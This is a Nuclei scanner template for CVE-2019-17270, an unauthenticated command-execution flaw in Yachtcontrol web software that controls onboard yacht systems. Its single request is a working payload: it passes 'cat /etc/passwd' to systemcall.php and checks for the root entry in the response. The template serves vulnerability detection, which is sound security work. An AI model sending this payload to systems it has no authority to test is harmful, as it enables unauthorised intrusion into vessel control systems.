nuclei-templates/cves/2019/CVE-2019-17270.yaml

33 lines
1.1 KiB
YAML

id: CVE-2019-17270
info:
name: Yachtcontrol Webapplication 1.0 - Unauthenticated Rce
author: pikpikcu
severity: high
reference: |
- https://www.exploit-db.com/exploits/47760
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
description: |
Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components
Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht
Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices
tags: rce,yachtcontrol,cve,cve2019
requests:
- method: GET
path:
- "{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
- type: status
status:
- 200